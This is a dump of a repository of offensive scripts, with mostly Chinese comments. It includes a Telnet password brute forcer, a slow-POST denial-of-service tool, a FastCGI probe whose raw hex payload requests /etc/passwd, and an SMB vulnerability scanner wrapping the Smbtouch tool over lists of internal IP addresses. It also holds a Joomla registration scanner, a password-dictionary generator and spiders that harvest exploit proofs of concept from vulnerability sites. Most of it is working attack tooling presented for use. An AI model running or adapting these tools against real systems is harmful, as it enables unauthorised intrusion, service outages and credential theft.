dic.append(str1_a+str2_a+str6_a+str6_b+str6_c) #姓名首字母加域名不要点 113 | dic.append(str1_a+str2_a+str6_a+'.'+str6_b+'.'+str6_c) #姓名首字母加域名带点 114 | for hz in str7: 115 | dic.append(str1_a+str2_a+hz) 116 | dic.append(str1+str2+hz) 117 | dic.append(str6_b+hz) 118 | print '***************************Mdic start*******************************' 119 | for i in dic: 120 | print i 121 | 122 | 123 | 124 | 125 | 
-------------------------------------------------------------------------------- /NTFS交换数据流检测工具.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/NTFS交换数据流检测工具.rar -------------------------------------------------------------------------------- /PythonSpider-BeeBeeto/BeeBeetoSpider.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | """ 5 | Function: Spider for BeeBeeto 6 | Author: PyxYuYu 7 | """ 8 | 9 | import urllib2 10 | from bs4 import BeautifulSoup 11 | import re 12 | import os 13 | import sys 14 | import argparse 15 | 16 | # 保存POC到txt文件 17 | def Poc_Save(save_path, save_name, poc): 18 | # 创建保存路径 19 | if not os.path.exists(save_path): 20 | os.makedirs(save_path) 21 | path = save_path + '/' + save_name 22 | with open(path, 'a+') as f: 23 | f.write(poc) 24 | f.write('\n') 25 | 26 | # 获取URL源码 27 | def Url_Soup(url): 28 | # 网站禁止爬虫,需要伪装浏览器 29 | user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0' 30 | request = urllib2.Request(url) 31 | request.add_header('User-Agent', user_agent) 32 | response = urllib2.urlopen(request) 33 | soup = BeautifulSoup(response.read(), 'html.parser') 34 | return soup 35 | 36 | # 获取POC数据 37 | def Poc_Get(): 38 | 39 | global poc_list 40 | global sign 41 | x = 1 42 | url_base = 'http://www.beebeeto.com/pdb/public/?page=' 43 | url_first = url_base + str(x) 44 | poc_path = './BeeBeeto' 45 | full_poc = Url_Soup(url_first).find_all(href=re.compile(r'poc')) 46 | for each_public in full_poc: 47 | poc_list.append(each_public.string) 48 | print each_public.string + ' is done.' 
49 | url_vul = url_index + each_public.attrs['href'] 50 | poc_detail = Url_Soup(url_vul).find_all('pre') 51 | for each_detail in poc_detail: 52 | poc_name = each_public.string.replace('/', '') + '.txt' 53 | Poc_Save(poc_path, poc_name, each_detail.string.encode('utf-8')) 54 | print 'This page is done.The next page is starting.' 55 | x = 2 56 | url = url_base + str(x) 57 | while x <= 100: 58 | if (sign!=0): 59 | Poc_Get1(url) 60 | x = x + 1 61 | url = url_base + str(x) 62 | else: 63 | break 64 | 65 | def Poc_Get1(url): 66 | 67 | global poc_list 68 | global sign 69 | poc_path = './BeeBeeto' 70 | full_poc = Url_Soup(url).find_all(href=re.compile(r'poc')) 71 | for each_public in full_poc: 72 | if each_public.string in poc_list: 73 | print "It's over." 74 | sign = 0 75 | return 0 76 | else: 77 | poc_list.append(each_public.string) 78 | print each_public.string + ' is done.' 79 | url_vul = url_index + each_public.attrs['href'] 80 | poc_detail = Url_Soup(url_vul).find_all('pre') 81 | for each_detail in poc_detail: 82 | # 针对文件名中不能出现的几个符号正则替换成空 83 | a = re.compile('[/\?\\<>:\*]') 84 | poc_name = a.sub('', each_public.string) + '.txt' 85 | Poc_Save(poc_path, poc_name, each_detail.string.encode('utf-8')) 86 | print 'This page is done.The next page is starting.' 87 | 88 | 89 | if __name__ == '__main__': 90 | sign = 1 91 | poc_list = [] 92 | print '----start----' 93 | url_index = 'http://www.beebeeto.com' 94 | Poc_Get() 95 | print '----end------' 96 | 97 | -------------------------------------------------------------------------------- /PythonSpider-BeeBeeto/README.MD: -------------------------------------------------------------------------------- 1 | * 爬虫目标:BeeBeeto 网站 2 | * 爬虫目的:下载POC,并保存 3 | * 爬虫思路: 4 | * 先爬取公开POC页面,然后爬取每个POC具体内容 5 | * 应该采用多线程机制 6 | * 应该加入命令行参数 7 | 8 |
9 | ---- 10 | * 今日BeeBeeto自动跳转Seebug,所以这个爬虫就结束了 11 | * 已经实现: 12 | * 多线程,简单命令行参数 13 | 14 |
15 | ---- 16 | 2016年3月9日 21:57:29 17 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/IVSpider-Wooyun/IVSpider.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | """ 5 | Function: Ingored Vulnerabilities Spider for Wooyun 6 | Author: PyxYuYu 7 | Time: 2016年3月11日 23:05:44 8 | """ 9 | 10 | import urllib2 11 | from bs4 import BeautifulSoup 12 | import re 13 | import time 14 | from cmdline import parse_args 15 | 16 | 17 | # 返回soup,获取url源码 18 | def url_res(url): 19 | user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0" 20 | req = urllib2.Request(url) 21 | req.add_header("User-Agent", user_agent) 22 | res = urllib2.urlopen(req).read() 23 | return res 24 | 25 | 26 | # 分析源码,正则或者BeautifulSoup模块 27 | def get_url(page): 28 | 29 | vul_public = "http://wooyun.org/bugs/new_public/page/" + str(page) 30 | # 测试用 31 | # print url_soup(vul_public).find_all('a') 32 | # 方法一:先找这个tag,找到后在找href,然后匹配 33 | # for each in BeautifulSoup(url_res(vul_public),'html.parser', from_encoding='UTF-8').find_all('a'): 34 | # # print each['href'] 35 | # # 判断一下是什么类型 unicode 36 | # # print type(each['href']) 37 | # # /bugs/wooyun-2016-0176846 正则匹配 38 | # # 会有2个网址匹配出来,带个#就只能匹配出一个了 39 | # url_re = re.compile(r'/bugs/.*\d{6}#') 40 | # # 返回的是一个列表,没匹配到返回空列表 41 | # each_url = url_re.findall(each['href']) 42 | # if each_url != []: 43 | # # 每个列表只有一个元素 44 | # # vul_list.append(each_url[0]) 45 | # print each_url[0] 46 | # # 寻找忽略漏洞 47 | # if get_vul(each_url[0]) > 0: 48 | # vul_detail(each_url[0]) 49 | # else: 50 | # print "Didn't find." 
51 | # else: 52 | # pass 53 | # 方法二:更加简单,直接匹配了找 54 | for each in BeautifulSoup(url_res(vul_public), 'html.parser', from_encoding='UTF-8').find_all(href=re.compile( 55 | r'/bugs/.*\d{6}'), title=None): 56 | # print each.string 57 | # 厂商忽略的漏洞 58 | if get_vul(each['href']) > 0: 59 | print each.string 60 | # vul_detail(each['href']) 61 | print "http://www.wooyun.org/" + each['href'] 62 | print "The vulnerability is ignored." 63 | else: 64 | # print "The vulnerability is fixed." 65 | pass 66 | 67 | 68 | def get_vul(url): 69 | 70 | url_ignored = "http://www.wooyun.org/" + url 71 | return url_res(url_ignored).find("忽略") 72 | 73 | 74 | def vul_detail(url): 75 | 76 | url_vul = "http://www.wooyun.org/" + url 77 | soup = BeautifulSoup(url_res(url_vul), 'html.parser', from_encoding='UTF-8') 78 | # print soup.find_all('title')[0].string 79 | for each in soup.find_all('code'): 80 | # 因为each.string 无法获取其内包含多个子节点的内容,返回None 81 | # 所以用 get_text() 82 | print each.get_text() 83 | 84 | 85 | def main(s_num, e_num): 86 | 87 | for i in range(s_num, e_num): 88 | get_url(i) 89 | 90 | print "-------------------It's done.--------------------" 91 | 92 | 93 | if __name__ == "__main__": 94 | start_time = time.time() 95 | # 创建命令行参数 Namespace对象 96 | args = parse_args() 97 | main(args.s, args.e) 98 | cost_time = time.time() - start_time 99 | print "Current spider is finished in " + str(int(cost_time / 60)) + " mins %.2f seconds." 
% (cost_time % 60) 100 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/IVSpider-Wooyun/README.md: -------------------------------------------------------------------------------- 1 | #IVSpider 2 | **I**gnored **V**ulnerabilities **S**pider for Wooyun 3 | ##Version 4 | ``` 5 | IVSpider.py ------- 单线程版本,舍弃 6 | IVSpider02.py ----- 多线程版本,下载本地后重命名为IVSpider.py即可 7 | ``` 8 | ##Usage 9 | ``` 10 | usage: IVSpider.py [options] 11 | 12 | *Ingored Vulnerabilities Spider for Wooyun.* 13 | 14 | optional arguments: 15 | -h, --help show this help message and exit 16 | -s StartPage The start page of Wooyun (default: 1) 17 | -e EndPage The end page of Wooyun, Not including (default: 2) 18 | -t Threads Num of threads for spider, 10 for default (default: 10) 19 | 20 | ``` 21 | ##Instruction 22 | ``` 23 | 1. Python 2.7.x && BeautifulSoup4==4.3.2 24 | 2. 自定义搜索起始页和终止页 25 | 3. 自定义线程数量 26 | ``` 27 | ##Example 28 | ``` 29 | python IVSpider.py -s 10 -e 30 -t 20 30 | ``` 31 | ##Bug 32 | ``` 33 | 1. 可能会被评论区的忽略给误导了 34 | 2. 
当数量大时,子线程可能会有几天不能正常关闭(原因未知,可能是Queue队列的Bug) 35 | ``` 36 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/IVSpider-Wooyun/cmdline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | import argparse 5 | import sys 6 | 7 | 8 | # 设置命令行参数 9 | def parse_args(): 10 | # argparse.ArgumentDefaultsHelpFormatter 最常用的输出格式 11 | parser = argparse.ArgumentParser(prog='IVSpider', formatter_class=argparse.ArgumentDefaultsHelpFormatter, 12 | description="*Ingored Vulnerabilities Spider for Wooyun.*", 13 | usage="IVSpider.py [options]") 14 | # metavar 参数在帮助信息的名字 15 | parser.add_argument('-s', metavar='StartPage', type=int, default=1, help="The start page of Wooyun") 16 | parser.add_argument('-e', metavar='EndPage', type=int, default=2, help="The end page of Wooyun, Not including") 17 | parser.add_argument('-t', metavar='Threads', type=int, default=10, help="Num of threads for spider, 10 for default") 18 | 19 | # 如果cmd接受到的参数只有1,也就是只有一个脚本名,那么就添加一个 -h/-help 的命令 20 | if len(sys.argv) == 1: 21 | sys.argv.append('-h') 22 | args = parser.parse_args() 23 | return args 24 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/README.md: -------------------------------------------------------------------------------- 1 | ##Project 2 | ``` 3 | 1. IVSpider 乌云忽略漏洞查询 4 | 5 | 2. 
WVSearch 乌云漏洞查询 6 | ``` 7 | ---- 8 | 2016年3月14日 21:47:58 9 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/WVSearch/README.md: -------------------------------------------------------------------------------- 1 | # WVSearch 2 | **W**ooyun **V**ulnerabilities **Search** 3 | ## Usage 4 | ``` 5 | usage: WVSearch.py [options] 6 | 7 | * Wooyun Vulnerabilities Search * 8 | 9 | optional arguments: 10 | -h, --help show this help message and exit 11 | -s StartPage Start page for searching (default: 1) 12 | -e EndPage End page for searching (default: 10) 13 | -t ThreadNum Num of threads (default: 10) 14 | -k KeyWord Keywords for searching (default: SQL|XSS|CSRF) 15 | --browser Open web browser to view report after after search was 16 | finished. (default: False) 17 | ``` 18 | ## Instruction 19 | ``` 20 | 1. Python 2.7.x && BeautifulSoup4==4.3.2 21 | 2. 自定义搜索的起始页和终止页 22 | 3. 自定义线程数,默认10 23 | 4. 自定义搜索关键词,用 '|' 分隔,关键词用双引号包裹 24 | 5. 结果保存为html文件,可以在搜索结束自动打开 25 | ``` 26 | ## Example 27 | ``` 28 | python WVSearch.py -s 10 -e 100 -t 20 -k "中国|SQL|XSS|xss" --browser 29 | ``` 30 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/WVSearch/cmdline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | 5 | import argparse 6 | import sys 7 | 8 | def parse_args(): 9 | 10 | # 创建一个命令行参数对象 11 | parser = argparse.ArgumentParser(prog='WVSearch', usage="WVSearch.py [options]", 12 | description="* Wooyun Vulnerabilities Search *", 13 | formatter_class=argparse.ArgumentDefaultsHelpFormatter) 14 | 15 | parser.add_argument('-s', metavar='StartPage', type=int, default=1, help='Start page for searching') 16 | parser.add_argument('-e', metavar='EndPage', type=int, default=10, help='End page for searching') 17 | parser.add_argument('-t', metavar='ThreadNum', type=int, default=10, help='Num of threads') 18 | 
parser.add_argument('-k', metavar='KeyWord', type=str, default='SQL|XSS|CSRF', help='Keywords for searching') 19 | parser.add_argument('--browser', default=False, action='store_true', 20 | help="Open web browser to view report after after search was finished.") 21 | 22 | # 如果什么都没输入,就输入了一个脚本名,那么就是sys.argv只有一个参数 23 | if len(sys.argv) == 1: 24 | sys.argv.append('-h') 25 | 26 | # 返回一个保存命令行参数的命名空间 27 | args = parser.parse_args() 28 | return args 29 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/WVSearch/report.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | TEMPLATE_html = """ 4 | 5 | 6 | WVSearch Report 7 | 12 | 13 | 14 |

Welcome to use the Wooyun Vulnerabilities Search. * WVSearch *

15 |

Current Search was finished in ${cost_min} min ${cost_seconds} seconds.

16 |

${total_name} vulnerabilities match the requirements of searching in total.

17 | ${content} 18 | 19 | 20 | """ 21 | 22 | TEMPLATE_result = """ 23 |
  • ${name}
  • 24 | """ 25 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/WVSearch/report/.gitigonre: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/PythonSpider-Wooyun/WVSearch/report/.gitigonre -------------------------------------------------------------------------------- /QQDataSearcher.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/QQDataSearcher.rar -------------------------------------------------------------------------------- /Smbscan/Smbtouch-1.1.1.fb: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | -------------------------------------------------------------------------------- /Smbscan/cmd.cmd: -------------------------------------------------------------------------------- 1 | cmd.exe -------------------------------------------------------------------------------- /Smbscan/ip.txt: -------------------------------------------------------------------------------- 1 | 10.100.2.2 2 | 10.100.2.1 3 | 10.100.2.6 4 | 10.100.2.9 5 | 10.100.2.12 6 | 10.100.228.152 7 | 10.100.246.163 8 | 10.100.251.249 9 | 10.200.13.231 10 | 10.200.80.19 11 | 10.200.87.172 12 | 10.200.100.147 13 | 10.200.101.49 14 | 10.201.161.37 -------------------------------------------------------------------------------- /Smbscan/ips.txt: -------------------------------------------------------------------------------- 1 | 10.40.0.201 2 | 10.40.4.102 3 | 10.40.6.6 4 | 10.40.6.102 5 | 10.40.6.105 6 | 10.40.6.113 7 | 10.40.6.109 8 | 10.40.6.116 9 | 10.40.6.115 10 | 10.40.6.126 11 | 10.40.7.102 12 | 10.40.7.104 13 | 10.40.7.107 14 | 10.40.7.114 15 | 10.40.7.115 16 | 10.40.7.117 17 | 10.40.7.116 18 | 10.40.7.171 19 | 10.40.7.206 20 | 
10.40.7.250 -------------------------------------------------------------------------------- /Smbscan/pytrch.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/Smbscan/pytrch.pyc -------------------------------------------------------------------------------- /Smbscan/smbscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import binascii 4 | import socket 5 | import struct 6 | import threading 7 | import subprocess 8 | import tempfile 9 | import re 10 | import Queue 11 | import sys 12 | 13 | def MyThread(urllist): 14 | threads = [] 15 | queue = Queue.Queue() 16 | for i in range(len(urllist)): 17 | queue.put((i+1,urllist[i].strip())) 18 | for x in xrange(0, int(sys.argv[2])): 19 | threads.append(tThread(queue)) 20 | 21 | for t in threads: 22 | t.start() 23 | for t in threads: 24 | t.join() 25 | 26 | 27 | class tThread(threading.Thread): 28 | def __init__(self, queue): 29 | threading.Thread.__init__(self) 30 | self.queue = queue 31 | 32 | def run(self): 33 | 34 | while not self.queue.empty(): 35 | num,host = self.queue.get() 36 | try: 37 | send2(host) 38 | except Exception,e: 39 | print '[%s/%s],%s,%s' %(num,nums,host,e) 40 | pass 41 | 42 | def logout(msg): 43 | with open('smbresult.txt','a') as f: 44 | print >>f,msg 45 | 46 | def send2(targetip): 47 | templist=[] 48 | templist.append(targetip) 49 | out_temp = tempfile.SpooledTemporaryFile(bufsize=10 * 1000) 50 | fileno = out_temp.fileno() 51 | run_cmd = 'Smbtouch-1.1.1.exe --TargetIp %s' % targetip.strip() 52 | app = subprocess.Popen(run_cmd, shell=True, stdout=fileno, stderr=fileno) 53 | app.wait() 54 | out_temp.seek(0) 55 | lines = out_temp.readlines() 56 | newlines = ''.join(lines) 57 | if "successfully" in newlines: 58 | info=re.findall("Target OS (Version.*?)\[",newlines,re.S)[0].strip().split("\r\n") 59 | 
vul=re.findall("\[Vulnerable\](.*?)\[",newlines,re.S)[0].strip().split("\r\n") 60 | for i in info: 61 | templist.append(i.strip()) 62 | for j in vul: 63 | templist.append(re.sub("\s*","",j.strip())) 64 | print "----".join(templist) 65 | logout("----".join(templist)) 66 | elif "Target OS" in newlines: 67 | info=re.findall("Target OS (Version.*?)\[",newlines,re.S)[0].strip().split("\r\n") 68 | for i in info: 69 | templist.append(i.strip()) 70 | print "----".join(templist) 71 | logout("----".join(templist)) 72 | #logout(newlines) 73 | 74 | if out_temp: 75 | out_temp.close() 76 | 77 | 78 | 79 | if __name__=='__main__': 80 | if len(sys.argv)==3: 81 | with open(sys.argv[1]) as f: 82 | urls=f.readlines() 83 | nums=len(urls) 84 | MyThread(urls) 85 | else: 86 | print "Python file.py ips.txt thread" -------------------------------------------------------------------------------- /TELNET暴力破解.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python 2 | 3 | #Telnet Brute Forcer 4 | #http://www.darkc0de.com 5 | #d3hydr8[at]gmail[dot]com 6 | 7 | import threading, time, random, sys, telnetlib 8 | from copy import copy 9 | 10 | if len(sys.argv) !=4: 11 | print "Usage: ./telnetbrute.py " 12 | sys.exit(1) 13 | 14 | try: 15 | users = open(sys.argv[2], "r").readlines() 16 | except(IOError): 17 | print "Error: Check your userlist path\n" 18 | sys.exit(1) 19 | 20 | try: 21 | words = open(sys.argv[3], "r").readlines() 22 | except(IOError): 23 | print "Error: Check your wordlist path\n" 24 | sys.exit(1) 25 | 26 | print "\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0" 27 | print "\t--------------------------------------------------\n" 28 | print "[+] Server:",sys.argv[1] 29 | print "[+] Users Loaded:",len(users) 30 | print "[+] Words Loaded:",len(words),"\n" 31 | 32 | wordlist = copy(words) 33 | 34 | def reloader(): 35 | for word in wordlist: 36 | words.append(word) 37 | 38 | def getword(): 39 | lock = threading.Lock() 40 | 
lock.acquire() 41 | if len(words) != 0: 42 | value = random.sample(words, 1) 43 | words.remove(value[0]) 44 | 45 | else: 46 | print "\nReloading Wordlist - Changing User\n" 47 | reloader() 48 | value = random.sample(words, 1) 49 | users.remove(users[0]) 50 | 51 | lock.release() 52 | if len(users) ==1: 53 | return value[0][:-1], users[0] 54 | else: 55 | return value[0][:-1], users[0][:-1] 56 | 57 | class Worker(threading.Thread): 58 | 59 | def run(self): 60 | value, user = getword() 61 | try: 62 | print "-"*12 63 | print "User:",user,"Password:",value 64 | tn = telnetlib.Telnet(sys.argv[1]) 65 | tn.read_until("login: ") 66 | tn.write(user + "\n") 67 | if password: 68 | tn.read_until("Password: ") 69 | tn.write(value + "\n") 70 | tn.write("ls\n") 71 | tn.write("exit\n") 72 | print tn.read_all() 73 | print "\t\nLogin successful:",value, user 74 | tn.close() 75 | work.join() 76 | sys.exit(2) 77 | except: 78 | pass 79 | 80 | for I in range(len(words)*len(users)): 81 | work = Worker() 82 | work.start() 83 | time.sleep(1) -------------------------------------------------------------------------------- /cc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | import time 4 | import threading 5 | #Pressure Test,ddos tool 6 | #--------------------------- 7 | MAX_CONN=20000 8 | PORT=80 9 | HOST="url" 10 | PAGE="/" 11 | #--------------------------- 12 | 13 | buf=("POST %s HTTP/1.1\r\n" 14 | "Host: %s\r\n" 15 | "Content-Length: 10000000\r\n" 16 | "Cookie: dklkt_dos_test\r\n" 17 | "\r\n" % (PAGE,HOST)) 18 | 19 | socks=[] 20 | 21 | def conn_thread(): 22 | global socks 23 | for i in range(0,MAX_CONN): 24 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 25 | try: 26 | s.connect((HOST,PORT)) 27 | s.send(buf) 28 | print "Send buf OK!,conn=%d\n"%i 29 | socks.append(s) 30 | except Exception,ex: 31 | print "Could not connect to server or send error:%s"%ex 32 | time.sleep(10) 33 | #end def 34 | 35 | def 
send_thread(): 36 | global socks 37 | while True: 38 | for s in socks: 39 | try: 40 | s.send("f") 41 | #print "send OK!" 42 | except Exception,ex: 43 | print "Send Exception:%s\n"%ex 44 | socks.remove(s) 45 | s.close() 46 | time.sleep(1) 47 | #end def 48 | 49 | conn_th=threading.Thread(target=conn_thread,args=()) 50 | send_th=threading.Thread(target=send_thread,args=()) 51 | 52 | conn_th.start() 53 | send_th.start() 54 | -------------------------------------------------------------------------------- /cgi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #cgi.py -a 110.164.68.1/24 -t 50 4 | import threading 5 | import argparse 6 | import socket 7 | import Queue 8 | import netaddr 9 | import time 10 | import sys 11 | class CgiScan: 12 | def __init__(self,addr,tnum): 13 | self.scanque = Queue.Queue() 14 | self.tnum = tnum 15 | self.tmpnum = tnum 16 | self.lock = threading.Lock() 17 | self.openlist = [] 18 | if addr.find("-") != -1: 19 | for ip in netaddr.IPRange(addr.split("-")[0],addr.split("-")[1]): 20 | self.scanque.put(ip) 21 | else: 22 | for ip in netaddr.IPNetwork(addr).iter_hosts(): 23 | self.scanque.put(ip) 24 | self.qsize = self.scanque.qsize() 25 | for i in range(tnum): 26 | t = threading.Thread(target=self.ScanPort) 27 | t.setDaemon(True) 28 | t.start() 29 | while self.tmpnum > 0: 30 | time.sleep(1.0) 31 | print '[*]:scan fastcgi vulnerable...' 
32 | for ip in self.openlist: 33 | self.test_fastcgi(ip) 34 | 35 | def test_fastcgi(self,ip): 36 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0) 37 | sock.connect((ip, 9000)) 38 | data = """ 39 | 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 40 | 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 41 | 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 42 | 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 43 | 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 44 | 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44 45 | 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 46 | 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 47 | 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53 48 | 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69 49 | 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00 50 | """ 51 | data_s = '' 52 | for _ in data.split(): 53 | data_s += chr(int(_,16)) 54 | sock.send(data_s) 55 | try: 56 | ret = sock.recv(1024) 57 | if ret.find(':root:') > 0: 58 | #print ret 59 | print '[+] %s is vulnerable!' 
% ip 60 | except Exception, e: 61 | pass 62 | 63 | sock.close() 64 | 65 | def ScanPort(self): 66 | while self.scanque.qsize() > 0: 67 | try: 68 | ip = self.scanque.get() 69 | self.lock.acquire() 70 | print str(ip) + " \r", 71 | self.lock.release() 72 | s = socket.socket() 73 | s.settimeout(3) 74 | s.connect((str(ip), 9000)) 75 | self.lock.acquire() 76 | print ip," 9000 open" 77 | self.openlist.append(str(ip)) 78 | self.lock.release() 79 | except: 80 | pass 81 | self.tmpnum -= 1 82 | if __name__ == "__main__": 83 | parse = argparse.ArgumentParser(description="CgiScan") 84 | parse.add_argument('-a','--addr', type=str, help="ipaddress") 85 | parse.add_argument('-t','--thread', type=int, help="Thread Number",default=100) 86 | args = parse.parse_args() 87 | if not args.addr: 88 | parse.print_help() 89 | sys.exit(0) 90 | addr = args.addr 91 | tnum = args.thread 92 | CgiScan(addr,tnum) -------------------------------------------------------------------------------- /com_user server scanner.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python 2 | 3 | import socket 4 | from urlparse import urlparse 5 | import time, urllib2, re, httplib 6 | print ''' 7 | #=[+]==========================================[+]=# 8 | | com_user server scanner | 9 | |==================================================| 10 | | Coded by Budz Story-zz | 11 | | Indonesian Fighter Cyber | 12 | #=[+]==========================================[+]=# 13 | ''' 14 | file2=open('user.txt','a') 15 | 16 | 17 | 18 | def check(site) : 19 | try : 20 | 21 | w = urllib2.urlopen(site).read() 22 | except urllib2.URLError, (err): 23 | pass 24 | except socket.error , v : 25 | pass 26 | except urllib2.HTTPError, err: 27 | pass 28 | except IOError, e: 29 | pass 30 | except httplib.IncompleteRead ,e: 31 | pass 32 | else : 33 | if re.findall('Joomla! - Open Source Content Management',w) : 34 | ox= urlparse(site) 35 | print 'w00t ! ! 
Found In => ' + ox[1] 36 | file2.write(ox[1]+'\n') 37 | 38 | def xlol(site): 39 | try: 40 | 41 | urllib2.urlopen(site) 42 | 43 | except urllib2.URLError, (err): 44 | pass 45 | except socket.error , v : 46 | pass 47 | except urllib2.HTTPError, err: 48 | pass 49 | except IOError, e: 50 | pass 51 | else: 52 | check(site) 53 | def bing_it(ip): 54 | 55 | page = 0 56 | while(page <= 200): 57 | try : 58 | bing = "http://www.bing.com/search?q=registration+site:"+ip+"+index.php%2Fusing-joomla%2Fextension%2F&go=&qs=ds&form=QBRE"+str(page) 59 | 60 | openbing = urllib2.urlopen(bing) 61 | 62 | readbing = openbing.read() 63 | findbing = re.findall('

    3 | 4 | ADD . /data 5 | WORKDIR /data/thog 6 | 7 | RUN apt-get update && apt-get install -y python-pip 8 | RUN pip install -r requirements.txt 9 | RUN chmod +x truffleHog/truffleHog.py 10 | 11 | WORKDIR /data 12 | RUN chmod +x rungitsecrets.sh 13 | RUN git clone https://github.com/anshumanbh/git-secrets.git && cd git-secrets && make install 14 | 15 | RUN go get github.com/google/go-github/github && go get github.com/satori/go.uuid && go get golang.org/x/oauth2 16 | RUN go build -o gitallsecrets . 17 | 18 | ENTRYPOINT ["./gitallsecrets"] -------------------------------------------------------------------------------- /git-all-secrets-master/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Anshuman Bhartiya 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /git-all-secrets-master/rungitsecrets.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd $1 4 | 5 | git secrets --install 6 | git secrets --register-aws 7 | git secrets --add 'xoxp-.*' 8 | git secrets --add 'xoxb-.*' 9 | git secrets --scan -r . > $2 10 | 11 | exit 0 -------------------------------------------------------------------------------- /git-all-secrets-master/thog/.gitignore: -------------------------------------------------------------------------------- 1 | /build/ 2 | /dist/ 3 | /truffleHog.egg-info/ 4 | */__pycache__/ 5 | env/ 6 | -------------------------------------------------------------------------------- /git-all-secrets-master/thog/requirements.txt: -------------------------------------------------------------------------------- 1 | Git==2.1.3 2 | gitdb2==2.0.2 3 | smmap2==2.0.2 4 | -------------------------------------------------------------------------------- /git-all-secrets-master/thog/setup.cfg: -------------------------------------------------------------------------------- 1 | [bdist_wheel] 2 | universal=1 3 | -------------------------------------------------------------------------------- /git-all-secrets-master/thog/setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup 2 | 3 | setup( 4 | name='truffleHog', 5 | version='1.0.2', 6 | description='Searches through git repositories for high entropy strings, digging deep into commit history.', 7 | url='https://github.com/dxa4481/truffleHog', 8 | author='Dylan Ayrey', 9 | author_email='dxa4481@rit.edu', 10 | license='GNU', 11 | packages =['truffleHog'], 12 | install_requires=[ 13 | 'GitPython == 2.1.1' 14 | ], 15 | entry_points = { 16 | 'console_scripts': ['trufflehog = truffleHog.truffleHog:main'], 17 | }, 18 | ) 19 | 
